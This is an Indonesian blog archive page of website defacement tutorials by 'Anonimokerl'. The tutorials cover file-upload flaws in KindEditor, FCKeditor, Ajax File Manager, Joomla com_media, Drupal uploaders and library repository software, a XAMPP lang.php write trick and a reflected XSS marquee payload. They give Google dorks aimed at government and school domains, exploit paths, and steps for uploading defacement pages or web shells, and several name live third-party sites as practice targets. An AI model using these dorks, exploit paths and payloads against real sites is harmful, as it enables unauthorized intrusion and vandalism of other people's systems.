Home » Archive for December 2017

DEFACE FILE UPLOAD MANAGER v1.3 RENAME TO

Add Comment ,
       Yo, balik lagi sama w Anonimokerl  :v Kali ini w bakal kasih tutor deface poc File Upload Manager v1.3 Rename To. Yok langsung saja ke persiapannya :v
Bahan :
-Dork :
intitle:File Upload Manager v1.3
"File Upload Manager v1.3" "rename to" "file types allowed"
(kembangin dengan otak vokep kalian)
-script deface ext html
 Contoh : Anonimokerl.htm
okey langsung saja ke langkah-langlahnya :v
1. Dorking pake dork diatas :v
2. Langsung pilih saja salah satu targetnya :v. Kalo vuln akan muncul seperti ini
3. terus kalian klik tombol choos file, karena w pake uc browser jadi tombol choose filenya berbeda :v kalo udah tekan lalu kalian cari scriptnya :v lalu kalian klik tombol upload :v kalo berhasil bakalan ada tulisan file has been uploaded! seperti gambar dibawah ini :v
4. Kalian harus kembali lagi ke halaman uploadnya. Dan panggil aja scriptnya dengan tempel /store/namasc.htm dibelakang pathnya
Contoh :
http://site.com/[path]/store/namasc.html
Dan taraaa halamnya berubah :v
Karena w baik w akan beri life target untuk mempermudah dalam mengusai poc ini :v
http://powerofmind.cba.pl/fileupload/
Terima kasih telah berkunjung :v
Kalo ada yang kurang mengerti bisa ditanyakan saja :v

Related Posts:

    DEFACE KINDEDITOR

    Add Comment ,
    Yoi, bertemu lagi dengan w Anonimokerl :v kali ini w mau share deface poc Kindeditor. Poc ini mungkin paling mudah karena cuman makan waktu 2menit doang :v tapi kalian jangan malu dulu karena kebanyakan defecer pro awalnya belajar poc ini :v
    Okey, langsung saja kita siapkan dulu Baham-bahannya
    -dork :
    inurl:examples/uploadbutton.html
    inurl:kindeditor
    -script html
    -sabun (buat pedamping :v)
    langsung saja kelangkah-langkahnya :v
    Pertama masukan dork dibrowser kalian :v
    kalo udah, lu pilih salah satu sitenya :v
    Kalau vuln akan seperti ini
    Kalo tampilannya gitu, kalian telan eh maksudnya tekan aja tombol upload lalu pilih script html kalian :v
    Kalau berhasil disamping tombol upload ada exploit :v nah itu masukan dibelakang sitenya, contoh :
    http://vokep.co.li/
    Lalu masukan exploitnya, dibelakang site nya, jadi
    http://vokep.co.li/upload/img/file/20171214/20171214144922_52258.html
    Maka tampilannya akan berubah sesuai script yang kalian upload :v
    Ini adalah beberapa site yang w upload :v
    sekian tutornya mohon maaf bila kurang jelas :v
    Kalau ada yang kurang jelas bisa ditanyakan saja di comment :v
    Okey :v

    Related Posts:

      DEFACE POC PRIV8 SCR

      Add Comment ,
            yup, bertemu lagi dengan w Anonimokerl  :v Kali Ini w Akan Share deface Poc Priv8 SCR. Sebelumnya kita siapkan dulu bahan-bahanya :v
      Bahan :
      -Dork : - inurl:config/config.izo
      kalo pengen dapat domain yang bagus kembangin lagi aja :v
      -Internet :v
      -sabun :v
      Okey langsung aja ke tahap-tahapnya
      Pertama kita dorking dulu di google 
      Kedua, klik targetnya, jika vuln maka akan muncul seperti ini 
      lalu kita isi semua kolomnya :v
      Di kolom paling besar lu ketik aja nick lu
      Sedangkan di kolom yang kecil lu ketik aja kata kata yang lu mau.
      Kalau udah diisi semuanya tekan aja Hajar !!.
      kalo berhasil akan muncul seperti ini. 
      Setelah itu, lu panggil aja defacenya. Caranya tambahkan /config/tar.tmp di belakang site
      contoh :
      http://site.com/config/tar.tmp
      Maka akan muncul seperti gambar dibawah :v
      dan selesai :)
      Ini adalah beberapa contoh hasil deface w pake poc ini.
      THANKS :*
      Jika tidak paham silahkan tanya tanya atau yang lain nya ..

      Related Posts:

        DEFACE POC XAMPP LOCAL WRITE ACCESS

        Add Comment ,
              Yosh bertemu lagi dengan w Anonimokerl :v kali ini w mau share deface poc Xampp Local Write Access.
        Okey langsung saja kita siapkan dulu bahan bahannya :v
        Bahan :
        -Dork :
          1) inurl:/xampp/lang.php
          2) inurl:/security/lang.php
          3) inurl:/xampp/splash.php
          4) inurl:xampp/index.php intitle:XAMPP
        kembangin biar banyak web yang masih fress
        -Exploit :
           /xampp/lang.php?Hacked_Anonimokerl  (untuk path /xammp atau dork no 1,3,4)
            /security/lang.php?Hacked_Anonimokerl   (untuk path /security atau dork no 2)
        Pada Nicknya bisa kalian ganti saja dengan nick kalian masing masing
        langkah-langkah :
        Seperti biasanya kita dorking dulu di browser :v
        Kalo udah kita pilih saja salah satu sitenya :v terus kita tambahkan exploit dibelakang sitenya contoh
        Http://site.com/xampp/lang.php?Hacked_Anonimokerl
        Kalau vuln maka tampilannya akan seperti ini
        Kalo tampilannya udah kayak gitu kita panggil aja hasil defacenya. Caranya yaitu tambahkan /xampp/lang.tmp dibelakang site :v
        Maka tampilannya akan seperti ini
        Taraaaa sitenya udah kita deface :v
        Karena w baik w bakal ngasih lige target untuk mempermudah dalam mempelajari poc ini :v
        http://www.colorin.com.ar/security/index.php
        Okey, sekian tutornya mohon maaf bila banyak yang kurang jelas :v
        kalo ada yang tidak mengerti bisa ditanyakan aja dengan cara comment :v

        Tidak ada komentar:
        Link ke posting ini
        Kontributor
        Diberdayakan oleh Blogger.

        Related Posts:

          DEFACE POC XSS VULNERANILITY

          Add Comment ,
              Yosh bertemu lagi dengan w Anonimokerl :v pada kesempatan sekarang w mau share deface poc XSS Vulnerability.
          Sebelumnya kita siapkan dulu bahan-bahannya :v
          Bahan :
          -Dork
           inurl:"/showcatrows.php?CategoryID=
          (Kembangin lagi :v)
          -exploit
          "><marquee><h1>DEFACED BY Anonimokerl ( G HAXOR TEAM )</h1></marquee>
          Nick ama teamnya bisa lu ubah :v
          Okey langsung saja ke langkah-langkahnya :v
          Pertama lu cari target menggunakan dork yang di atas
          Kedua, pilih salah satu web di atas sebagai target lu. Kalo vuln akan muncul seperti ini.
          setelah menemukan target tambahkan Explotnya dibelakang pathnya :v
          Ini web target saya awal nya  :
           http://download-by-zet.de/showcatrows.php?CategoryID=2
          Lalu tambahkan exploitnya :
          http://download-by-zet.de/showcatrows.php?CategoryID=2"><marquee><h1>DEFACED BY Anonimokerl ( G HAXOR TEAM )</h1></marquee>
          tekan enter deh :v
          Taraaa sekarang sitenya terdapat nick lu, seperti gambar dibawah ini
          Untuk praktiknya w kasih life target
          http://download-by-zet.de/showcatrows.php?CategoryID=2
          THANKS
          SEMOGA BERMANFAAT :V
          MOHON MAAF BILA BANYAK KESALAHAN
          KALO ADA YANG KURANG NGERTI BISA COMMENT SAJA DIBAWAH :V
          OKEY :)

          Related Posts:

            DEFACE COM_MEDIA

            Add Comment ,
            Hae bre
               Bertemu lagi dengan w Anonimokerl. Kali ini W bakal share cara deface tehnik com_media. Tehnik ini tehnik upload file yang cuma bisa upload file ext .txt, tapi tenang aja bisa di mirror di defacer.id kok :)
            Langsung saja ke bahan-bahannya :
            1. Dork :
               - inurl:index.php?option=com_media (harus pake exploit)
               - inurl:com_media intitle:insert image intext:maximum ( dork tanpa exploit )
            2. Exploit :
               - index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
            3. Script txt
            Caranya :
            Search salah satu dork di browser :v
            Lalu klik salah satu site :v
            Kalo lu pake dork pertama, lu harus tambahkan exploitnya dibelakang com.
            Contoh
            http://site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
            Kalo vuln maka tampilannya akan seperti ini
            Lalu lu tekan choose file dibawah dan pilih script txt lu :v tekan deh tombol upload :v kalo berhasil akan muncul tulisan berwarna hijau kalo gagal akan ada tulisan failed upload (warna merah)
            Kalo berhasil lu panggil aja scriptnya.
            Caranya tambahkan exploit /images/namafile.txt dibelakang site contohnya:
            http://site.com/images/anonimokerl.txt
            Lalu search deh :b
            OKEY :V THANKS YA :V

            Related Posts:

              DEFACE MESSANGE BOARD FORUM

              Add Comment ,
                    Bertemu lagi dengan w Anonimokerl kali ini w mau share deface poc messange Board Forum :v
              Langsung aja
              Bahan :
              -Dork :
              inurl:"/forum.php?forumid=
              Inurl:"/forum_topic_create.php?"
              Kembangin lagi :v okey
              -script txt
              -sabar :v
              -sabun bolong :v (buat pedamping :v)
              Okey langsung saja ke langkah-langkahnya :v
              Pertama search dulu dorknya di google :b
              Setelah itu kalian klik salah satu web :b
              Kalau vuln maka akan seperti ini.
              terus kita klik aja new Topic dibawah :v
              Kalau udah isi semua kolomnya dan masukkan script txtnya :v
              kalau udah tekan aja submit :b maka kita akan beralih ke halaman baru seperti dibahawah
              Setelah itu klik file lu maka akan muncul deh script nya :v
              Okey, sekian tutornya semoga bermanfaat :v

              Related Posts:

                DEFACE FILE ATTACHMENT UPLOAD REPOSITORY

                Add Comment ,

                       Yo bertemu lagi dengan w TN72 :v kali ini w mau share poc file attachment upload respository.
                Ok bro gk usah basa-basi Langsung aja siapkan bahan-bahannya
                Bahan :
                =Dork :
                - pustaka.*.go.id
                - pustaka.*.ac.id
                - pustaka.*.sch.id
                - pustaka.*.(isi dengan domain yang lu mau :v)
                =Exploit : /admin/modules/bibliography/pop_attach.php
                =script txt
                Ok langkah-langlahnya
                Pertama seacrh salah satu dork diatas

                kedua pilih salah satu site yang lu mau :v
                Ketiga tambahkan exploitnya
                Contoh:
                http://site.go.id/
                Tambahkan exploitnya menjadi
                http:/site.go.id/admin/modules/bibliography/pop_attach.php
                Kalau vuln maka tampilannya akan seperti ini ..


                terus lu isi aja yang ada tanda (*) terus tekan choose file, karena w pake uc browser jadi tombolnya berbeda :v
                lalu tekan deh tombol uploadnya. Kalo udah kita panggil aja scripnya
                Lokasi File : site.go.id/repository/yourfile.txt
                Example :
                http://perpus.stiq.ac.id/repository/tn72.txt
                Taraa tampilannya udah berubah :v


                sekian dari W mohon maaf bila banyak kesalahan :v
                Kalo ada yang tidak mengerti comen aja :v

                Related Posts:

                  DEFACE DRUPAL HIDDEN UPLOADER

                  Add Comment ,
                  Yosh bertemu lagi dengan w Anonimokerl :b disini w mau share deface poc drupal. Buat kalian yang ingin deface tapi kagak mau ribet bisa pake poc ini :v karena poc ini cuman memakan waktu 2 menit doang :v
                  Yosh kita mulai aja dengan mempersiapkan syarat dan bahan-bahannya :v
                  syarat :
                  -tamvan :v
                  -sabar :v
                  Bahan :
                  - Dork
                  = Allowed file types: png gif jpg txt. site:gov
                  = Allowed file types: png gif jpg txt. site:edu
                  = Allowed file types: png gif jpg txt. site:(domain negara yang anda inginkan)
                  -Script html dan txt
                  -paket internet :v
                  Yo kita langsung ke caranya :v
                  Pertama kita search dulu dorknya di browser :v
                  Lalu kita pilih salah satu site
                  Lalu cari tombol choose file, karena w pake uc browser jadi tombolnya berbeda :v
                  Setelah itu lu tekan choose file dan pilih script lu, lalu tekan deh tombol uploadnya
                  Kalo udah akan muncul script lu seperti dibawah ini
                  Kalo udah ada tekan deh script lu dan taraa tampilannya akan berubah menjadi script lu :v
                  Sekian dari saya mohon maaf bila kurang jelas :v

                  Related Posts:

                    DEFACE POC FCKEDITOR

                    Add Comment ,
                    Ket : fckeditor adalah metode deface dengan menitip file ke suatu site
                    Syarat :
                    - tamvan :v
                    -punya skil coli :b
                    -Kesabaran
                    Bahan bahan :
                    Script html dan shell (tidak semua site bisa tanem shell)
                    Dork :
                              inurl:advert_detail.php?id=
                    kembangin biar dapet yang Perawan  :v
                    Exploit
                    -          /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
                    Okey langsung kita ke tkp
                    Pertama kita search dulu dorknya dibrowser.
                    Kedua pilih salah satu site
                    Kalo sitenya vuln maka tampilannya akan seperti ini
                    ketiga masukan exploitnya dibelakang site contohnya
                    http://site.com lalu tambahkan exploitnya jadi http://site.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
                    setelah itu langsung saja upload file script lu
                    1.       Klik choose file ( cari script html atau shell  lu )
                    Dikarenakan w browsingnya pake uc brower jadi tombol choose filenya berbeda
                    2.       Klik upload
                    Kalo sudah di upload file nya, panggil aja script lu
                    Cara manggil script nya cukup ditambahkan /files/Namascriptlu.html dibelakang site
                    contoh http://site.com/files/Anonimokerl.html
                    kalau berhasil maka tampilannya akan berubah seperti script lu :v
                    Dan taraaaa lu sekarang bisa deface poc fckeditor :v
                    Jika lu tadi upload shell lu maka lu panggil dan akses deh shellnya :v
                    Ini adalah contoh hasil deface tadi
                    THANKS MOHON MAAF BILA BANYAK KESALAHAN :*

                    Related Posts:

                      DEFACE POC AJAX FILE MANAGER

                      Add Comment ,
                      deface poc ajax file manager
                      Seperti biasanya sebelum ke tkp kita siapkan dulu syarat dan bahan-bahannya :v
                      Syarat :
                      -tamvan :b
                      -kesabaran
                      -skill coli :v
                      Bahan:
                      -Dork :
                      intitle:"Ajax File Manager" site:au
                      inurl:/ajaxfilemanager.php intext:"/Root Folder"
                      inurl:/ajaxfilemanager.php intext:"upload"
                      inurl:/ajaxfilemanager.php .ac.
                      intitle:"index of" intext:"ajaxfilemanager.php"
                      Kembangkan Lagi Dengan Otak Hentai yang kalian miliki :v
                      Note : site: boleh di ganti dengan domain atau di hapus
                      - script html
                      - script txt (karena tidak semua site bisa upload pake html
                      Yosh kalau udah terkumpul semuanya kita langsung aja ke tkp
                      Pertama kita dorking dulu digoole :v
                      Lalu pilih salah satu site:v
                      Kalau udah, cari tombol choose file karena w pake uc browser jadi tombolnya beda :v
                      lalu kalian klik tombol choose file an pilih script html atau txt kalian :v. Setelah itu kalian klik refresh
                      Kalo udah, kalian cari file kalian :v
                      kalo dah ketemu kalian panggil aja filenya.
                      Caranya yaitu kalian tekan gambar kertas yang berwarna biru terus pilih show url
                      lalu copas deh :v
                      Lalu akan tampil deh script kalian :v
                      taraaaa kalian dah bisa poc ini :v

                      Related Posts:

                        Subscribe to: Posts (Atom)